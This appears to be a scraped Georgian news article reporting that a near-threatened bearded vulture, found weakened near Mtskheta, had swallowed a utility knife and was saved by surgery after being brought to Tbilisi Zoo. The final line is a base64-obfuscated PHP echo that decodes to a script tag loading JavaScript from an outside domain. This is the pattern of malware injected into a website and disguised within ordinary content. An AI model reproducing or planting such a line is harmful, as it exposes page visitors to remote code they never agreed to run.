celsiusi
ავერსი საქკაბელი
მცხეთის რაიონში ნაპოვნი ბატკანძერი, რომელსაც საკანცელარიო დანა ჰქონდა გადაყლაპული, რთული ოპერაციის შედეგად გადაარჩინეს.
 
არასამთავრობო ორგანიზაციის “Nature Conservation Georgia” თანახმად, დასუსტებული ფრინველი რამდენიმე დღით ადრე, სოფელ ნიჩბისში, მოქალაქემ იპოვა. მას ფრენა აღარ შეეძლო.
 
“[მოქალაქემ] თბილისის ზოოპარკს მიმართა, რის შემდეგაც ფაქტი მიეწოდა გარემოსდაცვითი ზედამხედველობის დეპარტამენტს. ზედამხედველობის თანამშრომლებმა ფაქტის დაფიქსირების შემდეგ ფრინველი გადმოიყვანეს თბილისის ზოოპარკში”, — ამბობს ორგანიზაცია.
 
ზოოპარკში მიყვანიდან რამდენიმე დღეში, როცა ფრინველი დამშვიდდა და მისთვის დამატებითი გამოკვლევების ჩატარება ნაკლებად სტრესული და სახიფათო გახდა, ფრინველი ვეტერინარულ კლინიკაში “Vetex” მიიყვანეს:
 
“აღმოჩნდა რომ ბატკანძერს გადაყლაპული ჰქონდა საკანცელარიო დანა, რისთვისაც საჭირო გახდა საკმაოდ რთული და ამბიციური ოპერაციის ჩატარება, რომელსაც ვეტექსის გუნდი საოცარი გამოცდილებით გაუმკლავდა. ოპერაციამ წარმატებით ჩაიარა”.
 
საკანცელარიო დანა, რომელიც ფრინველს ჰქონდა გადაყლაპული. ფოტო: Nature Conservation Georgia
 
 
ბატკანძერს გლობალურად საფრთხესთან მიახლოებულის სტატუსი აქვს. “Nature Conservation Georgia” იმედოვნებს, რომ ფრინველი სარეაბილიტაციო კურსსაც წარმატებით გაივლის და გამოჯანმრთელებული დაუბრუნდება ველურ ბუნებას.
 
“ამ საქმეზე კი თბილისის ზოოპარკი და მისი თანამშრომლები იზრუნებენ”, — დასძენს ის.
 
 
გარეკანის ფოტოები: Nature Conservation Georgia
842
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");